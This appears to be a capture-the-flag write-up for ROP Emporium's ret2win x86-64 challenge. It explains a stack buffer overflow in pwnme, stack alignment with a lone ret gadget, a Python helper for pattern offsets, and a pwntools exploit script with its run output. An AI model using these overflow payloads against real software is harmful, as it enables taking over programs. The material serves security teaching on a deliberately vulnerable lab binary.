#rop

# ret2win x86-64

## Triage

![](https://i.imgur.com/XvWCmIJ.png)

Like the website says, these challenges are based on ROPing, so NX will be enabled on all of them.

### Disassembly

The main function calls the vulnerable function pwnme:

![](https://i.imgur.com/5P7fOxE.png)

The pwnme function:

![](https://i.imgur.com/0oj0WSl.png)

## Vulnerability

In the pwnme function, 56 bytes are read into the user_input buffer, but that buffer sits on the stack at -0x28 (-40) bytes from the return address. If we supply 40 bytes of padding, the next 4 bytes overwrite only PART of the return address; because this is a 64-bit binary, we need to send 8 bytes instead of 4 to overwrite the whole return address.

Confirming the vulnerability, using python3 with `end=""` to drop the trailing newline:

```bash
python3 -c 'print("A"*40 + "B"*4,end="")' | strace ./ret2win
```

```bash
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
+++ killed by SIGSEGV (core dumped) +++
[1]    3247930 done       python3 -c 'print("A"*40 + "B"*4,end="")' |
       3247931 segmentation fault (core dumped)  strace ./ret2win
```

The faulting address 0x42424242 is our four "B" bytes: the low 32 bits of the saved return address were replaced and its upper 32 bits kept their original zeros, which is why a 4-byte probe is enough to prove control of the return address on a 64-bit target.

## Exploit

The binary contains a win function, `ret2win`:

![](https://i.imgur.com/XclH0tv.png)

Setting the program counter to the address of `ret2win` will execute the win function, BUT if you run the exploit in GDB you will see it actually crashes during the call:

![](https://i.imgur.com/Y5edNiF.png)

This is typically a stack-alignment issue: the x86-64 System V ABI requires rsp to be 16-byte aligned at the point of a call, and entering the win function through our overwritten return address instead of a real call leaves it off by 8. Returning to a lone `ret` gadget before returning into the win function moves rsp by another 8 and usually fixes it.
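The two calculations above, finding the offset to the return address from a crash value and deciding whether an alignment `ret` is needed, done in plain Python without pwntools. This is an added example for this writeup, not code from ROP Emporium or from the original script; the addresses in the demo at the bottom (`RET2WIN`, `RSP_AT_RET`) are placeholders you would replace with values read from the binary and from gdb, and the `RET_GADGET` value is the one the writeup's own script uses.

```python
"""Offset discovery and stack-alignment arithmetic for a ret2win overflow.

Added example, not from the original writeup: a pwntools-free version of the
two calculations the writeup performs by hand.
"""
import struct


def cyclic_pattern(length, alphabet=b"abcdefghijklmnopqrstuvwxyz", n=4):
    """Return `length` bytes of a de Bruijn sequence: every n-byte window is
    unique, so the bytes that land in a register identify their input offset."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if len(seq) >= length:          # stop early once we have enough bytes
            return
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq[:length])


def find_offset(pattern, crash_value, width=4):
    """Offset in `pattern` of the little-endian bytes that became `crash_value`.
    width=4 for a partial overwrite reported as a 32-bit si_addr (as in the
    writeup's strace run); width=8 when you read the full qword at rsp in gdb."""
    needle = crash_value.to_bytes(width, "little")
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("crash value not found in the pattern")
    return idx


def ret_gadgets_needed(rsp_at_ret):
    """Number of extra `ret` gadgets to place before the target address.

    rsp_at_ret is rsp when pwnme's own `ret` executes (read it in gdb). That
    `ret` pops 8 bytes, so the target starts with rsp = rsp_at_ret + 8; the
    System V ABI expects rsp % 16 == 8 at function entry, so rsp_at_ret must
    be 16-byte aligned. Each extra `ret` adds 8, so at most one is needed."""
    return 0 if rsp_at_ret % 16 == 0 else 1


def build_payload(offset, target, ret_gadget=None, pads=1):
    """padding + optional `ret` gadget(s) + target, as little-endian qwords."""
    payload = b"A" * offset
    if ret_gadget is not None:
        payload += struct.pack("<Q", ret_gadget) * pads
    payload += struct.pack("<Q", target)
    return payload


if __name__ == "__main__":
    # 1. Triage: send the 56 bytes pwnme reads, then map the fault back.
    pattern = cyclic_pattern(56)
    # Constructed crash value: what si_addr would show for this pattern
    # (the writeup's real run showed 0x42424242 for "A"*40 + "B"*4).
    simulated_si_addr = struct.unpack("<I", pattern[40:44])[0]
    print("offset from pattern:", find_offset(pattern, simulated_si_addr))
    print("offset from the writeup's probe:",
          find_offset(b"A" * 40 + b"B" * 4, 0x42424242))

    # 2. Exploit: placeholder values, not resolved from the real binary.
    RET_GADGET = 0x400755           # lone `ret` used by the writeup's script
    RET2WIN = 0xDEADBEEF            # hypothetical; use elf.sym['ret2win']
    RSP_AT_RET = 0x7FFD00000008     # hypothetical gdb reading at pwnme's ret
    pads = ret_gadgets_needed(RSP_AT_RET)
    payload = build_payload(40, RET2WIN, RET_GADGET, pads)
    print(f"{pads} alignment ret(s); {len(payload)}-byte payload:", payload.hex())
```

One caveat when using the full 8-byte pattern instead of the 4-byte probe: the overwritten qword is a non-canonical address, so the `ret` faults before rip is updated and gdb still shows rip at pwnme's `ret`. In that case read the 8 bytes at rsp and pass them to `find_offset` with `width=8`.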
### Script

```python
from pwn import *

context.binary = elf = ELF("./ret2win")

# address of a lone `ret` instruction, used to re-align the stack before ret2win
ret = p64(0x400755)

payload = b"A" * 40                  # fill the 32-byte buffer and the saved rbp (bytes, not str)
payload += ret                       # extra ret: moves rsp by 8 for 16-byte alignment
payload += p64(elf.sym['ret2win'])   # overwrite the return address with the win function

io = process("./ret2win")
gdb.attach(io)
io.sendline(payload)
io.interactive()
```

### Result

```bash
[*] '/home/chris/ctfs/ropemporium/ret2win/x64/ret2win'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './ret2win': pid 3250138
[*] running in new terminal: /usr/bin/gdb -q  "./ret2win" 3250138 -x "/tmp/pwn7EAQZw.gdb"
[+] Waiting for debugger: Done
[*] Switching to interactive mode
ret2win by ROP Emporium
x86_64

For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!

> Thank you!
Well done! Here's your flag:
ROPE{a_placeholder_32byte_flag!}
[*] Process './ret2win' stopped with exit code 0 (pid 3250138)
[*] Got EOF while reading in interactive
$
[*] Interrupted
```